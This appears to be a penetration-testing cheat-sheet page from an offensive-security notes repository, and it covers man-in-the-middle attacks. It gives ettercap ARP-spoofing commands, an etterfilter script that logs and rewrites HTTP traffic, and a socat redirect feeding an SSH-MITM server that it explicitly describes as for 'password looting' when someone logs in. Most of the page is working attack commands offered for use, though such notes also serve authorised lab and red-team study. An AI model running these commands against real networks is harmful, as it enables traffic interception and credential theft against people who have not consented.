killchain-compendium/Post Exploitation/Man in the Middle.md

49 lines
1.2 KiB
Markdown
Raw Permalink Normal View History

2022-11-11 01:15:07 +01:00
# Man In the Middle
2023-05-12 19:15:13 +02:00
## Ettercap
2022-11-11 01:15:07 +01:00
* [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/)
* ARP spoofing via ettercap and read traffic. Press q to reverse to pre mitm arp caches
```sh
ettercap -T -i <interface> -M arp
```
* Etterfilter can filter and restructure packets
```sh
man etterfilter
```
```sh
if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
log(DATA.data, "/tmp/ettercap.log");
replace("filename.html", "otherfilename.html" );
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
```
2023-05-12 19:15:13 +02:00
2022-11-11 01:15:07 +01:00
* Escape double quote inside the payload string
* compile via
```sh
etterfilter filter.ef -o filter.ef
```
* Run the filter via
```sh
ettercap -T -i <interface> -M arp -F filter.ef
```
2023-05-12 19:15:13 +02:00
## mitm-server
Set up a local Man in the middle server which can be used for example for password looting if somebody logs in.
[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`.
Redirect the port to the mitm server and start it afterwards
```sh
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)
ssh-mitm server --remote-host $TARGET_IP
```